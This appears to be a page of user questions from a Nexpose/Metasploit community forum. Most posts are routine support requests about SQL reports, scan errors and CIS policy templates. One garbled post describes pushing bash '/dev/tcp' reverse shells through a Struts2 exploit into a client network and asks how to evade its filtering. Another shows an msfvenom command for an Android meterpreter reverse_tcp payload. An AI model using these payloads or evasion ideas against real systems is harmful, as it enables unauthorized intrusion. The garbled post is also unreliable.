We have a weekly SQL report that is telling us whether a scan was 'scheduled' or whether it was 'manual'. When the scans are scheduled, we'd like to see which user actually scheduled that scan. Then we can move our scheduled recurring scans to a service account, and separate out those from any one-off scans we schedule to run outside of business hours. Alternately, if we can just report on which ones are recurring in the first place, that would accomplish the same thing. I can't seem to find these fields in the 'fact_scan' or 'dim_scan' schema, though. Is there a way to get this data without resorting to the Ruby gem?

    SELECT dim_site.name, started, finished,
           -- identifier aliases take double quotes in PostgreSQL
           round(extract(EPOCH FROM (finished)) - extract(EPOCH FROM (started))) AS "duration(s)",
           COUNT(asset_id) AS assets,
           dss.description AS status,
           dst.description AS type
    FROM dim_scan
    JOIN dim_site_scan USING (scan_id)
    JOIN dim_site USING (site_id)
    JOIN dim_scan_type dst USING (type_id)
    JOIN dim_scan_status dss USING (status_id)
    JOIN dim_site_asset dsa USING (site_id)
    WHERE started > (current_date - interval '7 days')
    GROUP BY dim_site.name, started, finished, status, type
    ORDER BY started
Posted by Craig Rickel about a year ago
Hello and thanks for providing this forum. Our IT staff request that we provide them with reports that list vulnerability remediation grouped by server. They do not patch on a vulnerability by vulnerability basis, but rather sit at a server and remediate all of the vulnerabilities, and then move to the next server. I am looking for a template or SQL query that will list this information in the following way, or something similar if possible:

    Server001 Update to the latest version of Adobe Acrobat
    Server001 Update to the latest version of Java
    Server002 Update to the latest version of Mozilla Firefox

They are not interested in how many vulnerabilities are present on each machine; that is our concern as the Security team. They are only interested in what needs to be done on each machine, grouped by machine. Thank you very much, and please have a nice day.
Posted by Monty Palmer about a year ago
Hello, there is a headache problem. The company assigned me a new rating client and I metasily vulnerable metasploit i but had a confusion I used Struts2 to send shells like bash> & / dev / tcp to the msf listening port, but the other took a kind of strategy for two days I have no progress in progress each other all the WEB services into the network and open an Internet using NGINX proxy_pass the data from the external network sent to the network through the NGINX bounce back BASH SESSION 1 # Network analysis However, I use the shell to upgrade meterpreter, session 2 # into 192.168 this IP, the nodes in the transmission of data should also have a security filter strategy, not all ports can successfully send bash to my metasploit. Is there any way to get further results? I have been GOOGLE did not gain anything. The other is WINDOWS VMWARE open centos 6.5 or unix x86-64. In the WEB UI FOR console are not found to be compatible with the payload I still have CobaltStrike pro, can assist you Both with msf + CobaltStrike
Posted by Dennis about a year ago
Hello there. I'm running Nexpose Security Console version 6.4.63, trying to perform a CIS Microsoft Office 2016 policy scan against a Windows 7 workstation with Office 2016 (32-bit) installed. The scan is able to return a benchmark result for only PowerPoint 2016; none of the other Office applications are included in the report. It seems as though the detection mechanism within the scan is failing to find that Word, Excel, Outlook, etc. are installed. I have looked through the scan log, but I haven't been able to identify how Nexpose performs the Office application detection (if it is merely a registry value that is missing from our installation, I could "fake it" and write the value in manually on my reference computer). Does anyone have any suggestions about either a short-term workaround or a long-term fix for this issue? (Vulnerability scans for the same asset in the same site are working fine. Combining vulnerability scanning and policy scanning into a single scan template does not result in Office applications being detected.) Thank you very much, -Oliver
Posted by Oliver Baty about a year ago
I have my Symantec Endpoint Protection manager forwarding the logs to an rsyslog server running on CentOS 7. I see the logs come into the /var/logs/message file. I have set the rsyslog.conf file to send the messages via TCP to the connector:port of the data collector. I can telnet to that port from the rsyslog server. When I turn debug on, I am seeing an error: TCPSendInit FAILED with -2027. Is there something I am missing?
Posted by Ben Bazian about a year ago
I am using Nexpose for the first time and after 36s of scan I get

    Local scan engine Failed (java.io.IOException: The Nmap exit value is not zero: -1073741819
        at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source)
        at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source)
        at com.rapid7.nexpose.scan.Scan.start(Unknown Source)
        at com.rapid7.nexpose.scan.Scan.run(Unknown Source)
        at java.lang.Thread.run(Thread.java:745)
    )

What's wrong? Probably my setting?
Posted by Alen about a year ago
Can you customize the CIS templates for use in the scans or do you have to scan using the default CIS template provided? For example, we may not need the level 2 settings in the CIS benchmark. Can we eliminate those from the scanning template we use?
Posted by Jeff Krumholz about a year ago
I've installed metasploit for Windows, but at first I tried to do it via bash terminal in the Windows 10 Ubuntu beta version (this is a separate issue as I get the error "warning files already exist" or something to that effect). I mention this in case it matters. I've gotten the installer to run and install, but the database does not work with the "postgres selected not connected" error. Tried editing the yml file, directing it to the yml, but still nothing. I am wondering if I must start the server in Windows cmd, but how do I do this? The installer I believe should have added the path variables, so I don't think that's the problem. Please help. Thanks. Any more info you need I will provide.
Posted by joe aggs about a year ago
Whenever I try starting a meterpreter session it always dies, and the result is like this:

    [*] Meterpreter session 3 opened (10.0.0.244:444 -> 18.104.22.168:34276) at 2017-11-21 13:17:10 -0800
    [*] 22.214.171.124 - Meterpreter session 3 closed. Reason: Died

My lport=444, lhost=(my internal ip), and my package command is

    msfvenom -p android/meterpreter/reverse_tcp lhost=(public ip) lport=444

and I have the port-forwarding enabled on the port 444. Please help.
Posted by HaydenSeward about a year ago
I am setting up a new virtual appliance. When I click on the management tab, a wizard runs and attempts to connect me to the Insight management platform. I accept the terms, choose a region, and I get an error message that says, "Unable to OnBoard" followed by "Please check that time on your machine is up to date, or use an NTP service." The time is set to automatically sync and appears to be up to date. How can I get past this error?
Posted by Andrew Woodworth about a year ago
I am running in AWS GovCloud and I am trying to set up the connection. When I select Amazon Web Services, GovCloud is not available. When I select AWS active sync, it is available, but I only see AWS active sync if I create the connection when going through administrator to create the connection, not when creating a site. First: Are there any known issues connecting my Nexpose instance running in my GovCloud VPC to Amazon Web Services
Posted by Robert Neil about a year ago
With the recent announcement from Intel about their new tool to check for the ME, SPS, and TXE vulnerabilities, is Nexpose going to be able to scan for them as well? I searched the database and didn't see any of the CVEs in Intel's release listed. Link to Intel's announcement: https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&languageid=en-fr Thanks.
Posted by Jake Dawley about a year ago